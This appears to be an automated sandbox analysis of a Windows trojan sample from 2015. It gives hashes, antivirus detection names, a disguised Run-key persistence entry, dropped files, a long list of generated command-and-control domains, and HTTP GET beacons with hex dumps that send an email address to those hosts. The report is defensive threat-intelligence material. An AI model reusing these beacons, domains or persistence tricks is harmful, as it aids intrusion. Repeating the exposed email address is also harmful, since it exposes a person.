Analysis Date2015-08-22 22:18:25
MD5474f89295c4c6cca4febe9ed3406330b
SHA115117849c4bc9b274c0bec75d8073008bffc593d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6393a2ca7f40d7da49793b2b3b63afa9 sha1: 2affc170b3048d560d8f6cb98261984407cd980f size: 301568
Section.rdata md5: fdbdc10731cedd205e3261d146f2e6dc sha1: af16035f1d5838f6db278982e33b4d17afb394ff size: 34816
Section.data md5: 1dcd7e9cc45597ae27082cbbbdca76a1 sha1: ef2bed6df25dd052f1c59a96313050fa6224a248 size: 92160
Timestamp2014-10-30 09:50:22
PackerMicrosoft Visual C++ ?.?
PEhashde54c02fc4d3cbb5b1b7db68bdb854cd1c1be93b
IMPhasha9c4b80511b4c2bf681e20a5336b8a85
AVCA (E-Trust Ino)Win32/Tnega.XAWY!suspicious
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader11.48796
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTROJ_FORUCON.BMC
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7Trojan ( 004938ec1 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAvira (antivir)BDS/Zegost.Gen4
AVMcafeeTrojan-FEMT!474F89295C4C
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Encrypting Windows AutoConfig Security ➝
C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\bcawahs.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.jzzh
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkscdunlkzdi\twgbiiocs.exe"

Network Details:

DNScrowdcircle.net
Type: A
50.63.202.49
DNSwatercircle.net
Type: A
202.181.99.36
DNSfightafraid.net
Type: A
195.22.26.252
DNSfightafraid.net
Type: A
195.22.26.253
DNSfightafraid.net
Type: A
195.22.26.254
DNSfightafraid.net
Type: A
195.22.26.231
DNSpartycircle.net
Type: A
82.150.140.89
DNSmelbourneit.hotkeysparking.com
Type: A
8.5.1.16
DNSgentlemanalways.net
Type: A
95.211.230.75
DNSsummerforest.net
Type: A
216.214.1.135
DNSwateranger.net
Type: A
209.221.136.249
DNSmembercircle.net
Type: A
DNSbeginmeasure.net
Type: A
DNSknownmeasure.net
Type: A
DNSbegindinner.net
Type: A
DNSknowndinner.net
Type: A
DNSbeginafraid.net
Type: A
DNSknownafraid.net
Type: A
DNSbegincircle.net
Type: A
DNSknowncircle.net
Type: A
DNSsummermeasure.net
Type: A
DNScrowdmeasure.net
Type: A
DNSsummerdinner.net
Type: A
DNScrowddinner.net
Type: A
DNSsummerafraid.net
Type: A
DNScrowdafraid.net
Type: A
DNSsummercircle.net
Type: A
DNSthoughtmeasure.net
Type: A
DNSwatermeasure.net
Type: A
DNSthoughtdinner.net
Type: A
DNSwaterdinner.net
Type: A
DNSthoughtafraid.net
Type: A
DNSwaterafraid.net
Type: A
DNSthoughtcircle.net
Type: A
DNSwomanmeasure.net
Type: A
DNSsmokemeasure.net
Type: A
DNSwomandinner.net
Type: A
DNSsmokedinner.net
Type: A
DNSwomanafraid.net
Type: A
DNSsmokeafraid.net
Type: A
DNSwomancircle.net
Type: A
DNSsmokecircle.net
Type: A
DNSpartymeasure.net
Type: A
DNSfightmeasure.net
Type: A
DNSpartydinner.net
Type: A
DNSfightdinner.net
Type: A
DNSpartyafraid.net
Type: A
DNSfightcircle.net
Type: A
DNSfreshwheat.net
Type: A
DNSexperiencewheat.net
Type: A
DNSfreshanger.net
Type: A
DNSexperienceanger.net
Type: A
DNSfreshalways.net
Type: A
DNSexperiencealways.net
Type: A
DNSfreshforest.net
Type: A
DNSexperienceforest.net
Type: A
DNSgentlemanwheat.net
Type: A
DNSalreadywheat.net
Type: A
DNSgentlemananger.net
Type: A
DNSalreadyanger.net
Type: A
DNSalreadyalways.net
Type: A
DNSgentlemanforest.net
Type: A
DNSalreadyforest.net
Type: A
DNSfollowwheat.net
Type: A
DNSmemberwheat.net
Type: A
DNSfollowanger.net
Type: A
DNSmemberanger.net
Type: A
DNSfollowalways.net
Type: A
DNSmemberalways.net
Type: A
DNSfollowforest.net
Type: A
DNSmemberforest.net
Type: A
DNSbeginwheat.net
Type: A
DNSknownwheat.net
Type: A
DNSbeginanger.net
Type: A
DNSknownanger.net
Type: A
DNSbeginalways.net
Type: A
DNSknownalways.net
Type: A
DNSbeginforest.net
Type: A
DNSknownforest.net
Type: A
DNSsummerwheat.net
Type: A
DNScrowdwheat.net
Type: A
DNSsummeranger.net
Type: A
DNScrowdanger.net
Type: A
DNSsummeralways.net
Type: A
DNScrowdalways.net
Type: A
DNScrowdforest.net
Type: A
DNSthoughtwheat.net
Type: A
DNSwaterwheat.net
Type: A
DNSthoughtanger.net
Type: A
HTTP GEThttp://crowdcircle.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://watercircle.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://fightafraid.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://partycircle.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://freshanger.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://gentlemanalways.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://summerforest.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://wateranger.net/index.php?email=ramoniq_28@yahoo.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 50.63.202.49:80
Flows TCP192.168.1.1:1032 ➝ 202.181.99.36:80
Flows TCP192.168.1.1:1033 ➝ 195.22.26.252:80
Flows TCP192.168.1.1:1034 ➝ 82.150.140.89:80
Flows TCP192.168.1.1:1035 ➝ 8.5.1.16:80
Flows TCP192.168.1.1:1036 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1037 ➝ 216.214.1.135:80
Flows TCP192.168.1.1:1038 ➝ 209.221.136.249:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206372 6f776463   se..Host: crowdc
0x00000070 (00112)   6972636c 652e6e65 740d0a0d 0a         ircle.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207761 74657263   se..Host: waterc
0x00000070 (00112)   6972636c 652e6e65 740d0a0d 0a         ircle.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206669 67687461   se..Host: fighta
0x00000070 (00112)   66726169 642e6e65 740d0a0d 0a         fraid.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207061 72747963   se..Host: partyc
0x00000070 (00112)   6972636c 652e6e65 740d0a0d 0a         ircle.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206672 65736861   se..Host: fresha
0x00000070 (00112)   6e676572 2e6e6574 0d0a0d0a 0a         nger.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206765 6e746c65   se..Host: gentle
0x00000070 (00112)   6d616e61 6c776179 732e6e65 740d0a0d   manalways.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207375 6d6d6572   se..Host: summer
0x00000070 (00112)   666f7265 73742e6e 65740d0a 0d0a0a0d   forest.net......
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d72616d 6f6e6971 5f323840   mail=ramoniq_28@
0x00000020 (00032)   7961686f 6f2e636f 6d266d65 74686f64   yahoo.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207761 74657261   se..Host: watera
0x00000070 (00112)   6e676572 2e6e6574 0d0a0d0a 0d0a0a0d   nger.net........
0x00000080 (00128)   0a                                    .


Strings